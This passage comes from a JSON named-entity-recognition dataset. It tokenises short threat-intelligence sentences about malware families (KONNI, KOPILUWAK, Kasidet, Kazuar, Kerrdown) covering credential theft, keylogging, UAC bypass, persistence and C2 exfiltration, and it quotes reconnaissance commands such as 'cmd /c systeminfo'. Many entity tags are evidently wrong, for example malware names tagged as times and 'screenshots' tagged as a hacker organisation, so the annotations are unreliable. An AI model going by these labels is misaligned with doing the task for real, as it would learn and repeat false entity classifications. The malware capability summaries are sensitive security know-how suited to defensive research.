- "bypassing", - "UAC", - "set", - "to", - "“AlwaysNotify\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "had", - "a", - "feature", - "to", - "steal", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "modified", - "ComSysApp", - "service", - "to", - "load", - "the", - "malicious", - "DLL", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "duplicated", - "the", - "token", - "of", - "a", - "high", - "integrity", - "process", - "to", - "spawn", - "an", - "instance", - "of", - "cmd.exe", - "under", - "an", - "impersonated", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "steal", - "profiles", - "(containing", - "credential", - "information)", - "from", - "Firefox,", - "Chrome,", - "and", - "Opera." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "stored", - "collected", - "information", - "and", - "discovered", - "processes", - "in", - "a", - "tmp", - "file." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "certutil", - "to", - "download", - "and", - "decode", - "base64", - "encoded", - "strings", - "and", - "has", - "also", - "devoted", - "a", - "custom", - "section", - "to", - "performing", - "all", - "the", - "components", - "of", - "the", - "deobfuscation", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "is", - "heavily", - "obfuscated", - "and", - "includes", - "encrypted", - "configuration", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "sent", - "data", - "and", - "files", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "FTP", - "to", - "exfiltrate", - "reconnaissance", - "data", - "out." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "KONNI", - "searches", - "for", - "filenames", - "created", - "with", - "a", - "previous", - "version", - "of", - "the", - "malware,", - "suggesting", - "different", - "versions", - "targeted", - "the", - "same", - "victims", - "and", - "the", - "versions", - "may", - "work", - "together." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "download", - "files", - "and", - "execute", - "them", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "executed", - "malicious", - "JavaScript", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "the", - "capability", - "to", - "perform", - "keylogging." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "relied", - "on", - "a", - "victim", - "to", - "enable", - "malicious", - "macros", - "within", - "an", - "attachment", - "delivered", - "via", - "email." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "pretended", - "to", - "be", - "the", - "xmlProv", - "Network", - "Provisioning", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "created", - "a", - "shortcut", - "called", - "\"Anti", - "virus", - "service.lnk\"", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "modified", - "registry", - "keys", - "of", - "ComSysApp,", - "Svchost,", - "and", - "xmlProv", - "on", - "the", - "machine", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "hardcoded", - "API", - "calls", - "within", - "its", - "functions", - "to", - "use", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "parent", - "PID", - "spoofing", - "to", - "spawn", - "a", - "new", - "`cmd`", - "process", - "using", - "`CreateProcessW`", - "and", - "a", - "handle", - "to", - "`Taskmgr.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "KONNI", - "used", - "PowerShell", - "to", - "download", - "and", - "execute", - "a", - "specific", - "64-bit", - "version", - "of", - "the", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "the", - "command", - "<code>cmd", - "/c", - "tasklist</code>", - "to", - "get", - "a", - "snapshot", - "of", - "the", - "current", - "processes", - "on", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "KONNI", - "has", - "dropped", - "a", - "Windows", - "shortcut", - "into", - "the", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "Rundll32", - "to", - "execute", - "its", - "loader", - "for", - "privilege", - "escalation", - "purposes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "take", - "screenshots", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "KONNI", - "drops", - "a", - "Windows", - "shortcut", - "on", - "the", - "victim’s", - "machine", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "been", - "packed", - "for", - "obfuscation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "been", - "delivered", - "via", - "spearphishing", - "campaigns", - "through", - "a", - "malicious", - "Word", - "document." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "a", - "custom", - "base64", - "key", - "to", - "encode", - "stolen", - "data", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "AES", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "gather", - "the", - "OS", - "version,", - "architecture", - "information,", - "connected", - "drives,", - "hostname,", - "RAM", - "size,", - "and", - "disk", - "space", - "information", - "from", - "the", - "victim’s", - "machine", - "and", - "has", - "used", - "<code>cmd", - "/c", - "systeminfo</code>", - "command", - "to", - "get", - "a", - "snapshot", - "of", - "the", - "current", - "system", - "state", - "of", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "collect", - "the", - "IP", - "address", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "<code>net", - "session</code>", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "can", - "collect", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "HTTP", - "POST", - "for", - "C2." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "used", - "cmd.exe", - "to", - "execute", - "arbitrary", - "commands", - "on", - "the", - "infected", - "host", - "across", - "different", - "stages", - "of", - "the", - "infection", - "chain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "registered", - "itself", - "as", - "a", - "service", - "using", - "its", - "export", - "function." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "gather", - "information", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "has", - "exfiltrated", - "collected", - "data", - "to", - "its", - "C2", - "via", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "had", - "used", - "Javascript", - "to", - "perform", - "its", - "core", - "functions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "has", - "piped", - "the", - "results", - "from", - "executed", - "C2", - "commands", - "to", - "`%TEMP%\\result2.dat`", - "on", - "the", - "local", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "has", - "gained", - "execution", - "through", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "use", - "netstat", - "and", - "Net", - "to", - "discover", - "network", - "shares." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "enumerate", - "current", - "running", - "processes", - "on", - "the", - "targeted", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "has", - "been", - "delivered", - "to", - "victims", - "as", - "a", - "malicious", - "email", - "attachment." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "discover", - "logical", - "drive", - "information", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "use", - "Arp", - "to", - "discover", - "a", - "target's", - "network", - "configuration", - "setttings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "use", - "netstat,", - "Arp,", - "and", - "Net", - "to", - "discover", - "current", - "TCP", - "connections." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "can", - "conduct", - "basic", - "network", - "reconnaissance", - "on", - "the", - "victim", - "machine", - "with", - "`whoami`,", - "to", - "get", - "user", - "details." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOPILUWAK", - "has", - "used", - "HTTP", - "POST", - "requests", - "to", - "send", - "data", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "change", - "firewall", - "settings", - "to", - "allow", - "a", - "plug-in", - "to", - "be", - "downloaded." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "search", - "for", - "a", - "given", - "filename", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "initiate", - "keylogging." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "search", - "for", - "a", - "given", - "process", - "name", - "in", - "processes", - "currently", - "running", - "in", - "the", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "creates", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "initiate", - "keylogging", - "and", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "identify", - "any", - "anti-virus", - "installed", - "on", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "has", - "the", - "ability", - "to", - "obtain", - "a", - "victim's", - "system", - "name", - "and", - "operating", - "system", - "version." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kasidet", - "can", - "execute", - "commands", - "using", - "cmd.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Kazuar", - "gathers", - "information", - "about", - "opened", - "windows." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "has", - "used", - "compromised", - "WordPress", - "blogs", - "as", - "C2", - "servers." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "can", - "overwrite", - "files", - "with", - "random", - "data", - "before", - "deleting", - "them." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "uploads", - "files", - "from", - "a", - "specified", - "directory", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "running", - "in", - "a", - "Windows", - "environment,", - "Kazuar", - "saves", - "a", - "DLL", - "to", - "disk", - "that", - "is", - "injected", - "into", - "the", - "explorer.exe", - "process", - "to", - "execute", - "the", - "payload.", - "Kazuar", - "can", - "also", - "be", - "configured", - "to", - "inject", - "and", - "execute", - "within", - "specific", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "can", - "accept", - "multiple", - "URLs", - "for", - "C2", - "servers." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "can", - "delete", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "uses", - "FTP", - "and", - "FTPS", - "to", - "communicate", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "finds", - "a", - "specified", - "directory,", - "lists", - "the", - "files", - "and", - "metadata", - "about", - "those", - "files." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "downloads", - "additional", - "plug-ins", - "to", - "load", - "on", - "the", - "victim’s", - "machine,", - "including", - "the", - "ability", - "to", - "upgrade", - "and", - "replace", - "its", - "own", - "binary." - ], - "ner_tags": [ - "B-Time", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "has", - "used", - "internal", - "nodes", - "on", - "the", - "compromised", - "network", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "gathers", - "information", - "on", - "local", - "groups", - "and", - "members", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "stages", - "command", - "output", - "and", - "collected", - "data", - "in", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "gathers", - "information", - "about", - "local", - "groups", - "and", - "members." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "is", - "obfuscated", - "using", - "the", - "open", - "source", - "ConfuserEx", - "protector.", - "Kazuar", - "also", - "obfuscates", - "the", - "name", - "of", - "created", - "files/folders/mutexes", - "and", - "encrypts", - "debug", - "messages", - "written", - "to", - "log", - "files", - "using", - "the", - "Rijndael", - "cipher." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Kazuar", - "obtains", - "a", - "list", - "of", - "running", - "processes", - "through", - "WMI", - "querying", - "and", - "the", - "<code>ps</code>", - "command." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "adds", - "a", - "sub-key", - "under", - "several", - "Registry", - "run", - "keys." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "can", - "sleep", - "for", - "a", - "specific", - "time", - "and", - "be", - "set", - "to", - "communicate", - "at", - "specific", - "intervals." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "captures", - "screenshots", - "of", - "the", - "victim’s", - "screen." - ], - "ner_tags": [ - "B-Time", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "adds", - "a", - ".lnk", - "file", - "to", - "the", - "Windows", - "startup", - "folder." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "encodes", - "communications", - "to", - "the", - "C2", - "server", - "in", - "Base64." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "gathers", - "information", - "on", - "the", - "system", - "and", - "local", - "drives." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "gathers", - "information", - "about", - "network", - "adapters." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "gathers", - "information", - "on", - "users." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "uses", - "/bin/bash", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "captures", - "images", - "from", - "the", - "webcam." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "uses", - "HTTP", - "and", - "HTTPS", - "to", - "communicate", - "with", - "the", - "C2", - "server.", - "Kazuar", - "can", - "also", - "act", - "as", - "a", - "webserver", - "and", - "listen", - "for", - "inbound", - "HTTP", - "requests", - "through", - "an", - "exposed", - "API." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "uses", - "cmd.exe", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "obtains", - "a", - "list", - "of", - "running", - "processes", - "through", - "WMI", - "querying." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O" - ] - }, - { - "tokens": [ - "Kazuar", - "can", - "install", - "itself", - "as", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "can", - "use", - "DLL", - "side-loading", - "to", - "load", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "can", - "decode,", - "decrypt,", - "and", - "decompress", - "multiple", - "layers", - "of", - "shellcode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "can", - "download", - "specific", - "payloads", - "to", - "a", - "compromised", - "host", - "based", - "on", - "OS", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "has", - "gained", - "execution", - "through", - "victims", - "opening", - "malicious", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "has", - "gained", - "execution", - "through", - "victims", - "opening", - "malicious", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "can", - "encrypt,", - "encode,", - "and", - "compress", - "multiple", - "layers", - "of", - "shellcode." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "has", - "been", - "distributed", - "through", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "has", - "been", - "distributed", - "via", - "e-mails", - "containing", - "a", - "malicious", - "link." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "has", - "the", - "ability", - "to", - "determine", - "if", - "the", - "compromised", - "host", - "is", - "running", - "a", - "32", - "or", - "64", - "bit", - "OS", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kerrdown", - "can", - "use", - "a", - "VBS", - "base64", - "decoder", - "function", - "published", - "by", - "Motobit." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Kessel", - 